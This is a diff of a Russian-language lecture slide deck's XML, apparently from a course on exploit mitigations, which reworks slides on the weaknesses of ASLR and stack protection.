+    <p:sldId id="268" r:id="rId16"/>
+    <p:sldId id="282" r:id="rId17"/>
+    <p:sldId id="269" r:id="rId18"/>
+    <p:sldId id="273" r:id="rId19"/>
+    <p:sldId id="272" r:id="rId20"/>
+    <p:sldId id="274" r:id="rId21"/>
+    <p:sldId id="284" r:id="rId22"/>
+    <p:sldId id="277" r:id="rId23"/>
+    <p:sldId id="285" r:id="rId24"/>
+    <p:sldId id="286" r:id="rId25"/>
+    <p:sldId id="283" r:id="rId26"/>
+    <p:sldId id="275" r:id="rId27"/>
+    <p:sldId id="276" r:id="rId28"/>
+    <p:sldId id="278" r:id="rId29"/>
+    <p:sldId id="287" r:id="rId30"/>
+    <p:sldId id="288" r:id="rId31"/>
+    <p:sldId id="291" r:id="rId32"/>
+    <p:sldId id="289" r:id="rId33"/>
+    <p:sldId id="290" r:id="rId34"/>
+    <p:sldId id="292" r:id="rId35"/>
+    <p:sldId id="332" r:id="rId36"/>
+    <p:sldId id="293" r:id="rId37"/>
+    <p:sldId id="294" r:id="rId38"/>
+    <p:sldId id="295" r:id="rId39"/>
+    <p:sldId id="296" r:id="rId40"/>
+    <p:sldId id="297" r:id="rId41"/>
+    <p:sldId id="298" r:id="rId42"/>
+    <p:sldId id="300" r:id="rId43"/>
+    <p:sldId id="301" r:id="rId44"/>
+    <p:sldId id="302" r:id="rId45"/>
+    <p:sldId id="299" r:id="rId46"/>
+    <p:sldId id="303" r:id="rId47"/>
+    <p:sldId id="304" r:id="rId48"/>
+    <p:sldId id="305" r:id="rId49"/>
+    <p:sldId id="306" r:id="rId50"/>
+    <p:sldId id="307" r:id="rId51"/>
+    <p:sldId id="308" r:id="rId52"/>
+    <p:sldId id="309" r:id="rId53"/>
+    <p:sldId id="310" r:id="rId54"/>
+    <p:sldId id="311" r:id="rId55"/>
+    <p:sldId id="312" r:id="rId56"/>
+    <p:sldId id="313" r:id="rId57"/>
+    <p:sldId id="314" r:id="rId58"/>
+    <p:sldId id="315" r:id="rId59"/>
+    <p:sldId id="316" r:id="rId60"/>
+    <p:sldId id="317" r:id="rId61"/>
+    <p:sldId id="318" r:id="rId62"/>
+    <p:sldId id="319" r:id="rId63"/>
+    <p:sldId id="320" r:id="rId64"/>
+    <p:sldId id="321" r:id="rId65"/>
+    <p:sldId id="322" r:id="rId66"/>
+    <p:sldId id="323" r:id="rId67"/>
+    <p:sldId id="324" r:id="rId68"/>
+    <p:sldId id="325" r:id="rId69"/>
+    <p:sldId id="326" r:id="rId70"/>
+    <p:sldId id="327" r:id="rId71"/>
+    <p:sldId id="328" r:id="rId72"/>
+    <p:sldId id="329" r:id="rId73"/>
+    <p:sldId id="330" r:id="rId74"/>
+    <p:sldId id="331" r:id="rId75"/>
+    <p:sldId id="271" r:id="rId76"/>
+    <p:sldId id="270" r:id="rId77"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -333,7 +334,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -531,7 +532,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -739,7 +740,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -937,7 +938,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1212,7 +1213,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1477,7 +1478,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1889,7 +1890,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2030,7 +2031,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2143,7 +2144,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2454,7 +2455,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2742,7 +2743,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2983,7 +2984,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/12/2025</a:t>
+              <a:t>7/13/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4151,7 +4152,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостатки</a:t>
+              <a:t>Накладные расходы</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -4181,7 +4182,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4221,7 +4222,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ASLR оказалась несовместима с предлинковки </a:t>
+              <a:t>ASLR несовместима с предлинковкой </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -4255,176 +4256,6 @@
               <a:t>Динамические библиотеки и способы ускорения их работы</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>False negatives:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Уязвимость к </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>info leakage attacks (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>например </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Format string attacks</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>):</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизируется только базовый адрес приложения</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>библиотек</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Хакер знает относительные смещения кода, глобальных переменных, таблиц GOT/PLT</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>сли становится известен адрес хотя бы одной сущности</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> – </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>защита</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>скомпрометирована</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостаточная рандомизация</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не все биты адреса одинаково случайны</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="3"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>The Illusion of Randomness</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Относительный порядок библиотек и программы может быть неслучаен</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="3"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Six facts about SLR on Windows</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Windows</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="3"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="3"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Linux рандомизация делается однократно при старте сервиса =&gt; уязвима к brute force (особенно на 32-битных платформах)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется делать регулярный рестарт сервисов</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4463,6 +4294,410 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7097E2FD-8987-4F32-897D-14D61507ABB5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Недостатки</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: false negatives</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64189045-44DE-49F5-92D6-619EA234B4AD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="600635" y="1550894"/>
+            <a:ext cx="10753165" cy="4626069"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Уязвимость к </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>info leakage attacks (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>например </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Format string attacks</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизируется только базовый адрес приложения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>библиотек</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Хакер знает относительные смещения кода, глобальных переменных, таблиц GOT/PLT</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>сли становится известен адрес хотя бы одной сущности</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защита</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>скомпрометирована</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Недостаточная рандомизация</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не все биты адреса одинаково случайны</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>The Illusion of Randomness</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизируется только база </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>адресов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>delta_mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>) =&gt; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>относительный библиотек и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>регионов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>фиксирован</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>рандомизирует порядок загрузки библиотек и промежутки между ними</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>How vulnerabilities help shape security features and mitigations in Android</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows и ранних </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Six facts about SLR on Windows</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>Stagefrightened</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>Android</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>fork </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компрометирует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ASLR</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В частности </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Zygote-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>процесс в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId7"/>
+              </a:rPr>
+              <a:t>Choose One: Android Performance or Security</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Linux рандомизация делается однократно при старте сервиса =&gt; уязвима к brute force (особенно на 32-битных платформах)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется делать регулярный рестарт сервисов</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1248994032"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D99230-571D-42A7-BABC-A33D57B58336}"/>
               </a:ext>
             </a:extLst>
@@ -4554,7 +4789,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -4637,7 +4872,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5159,7 +5394,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide18.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5430,7 +5665,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide18.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -5602,13 +5837,28 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Не защищает от переписывания пользовательских указателей на функции на стеке</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не защащиет от переписывания адреса возврата без </a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или библиотечных, например </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>atexit</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> handlers)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не защищает от переписывания адреса возврата без </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -5621,229 +5871,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2785232993"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
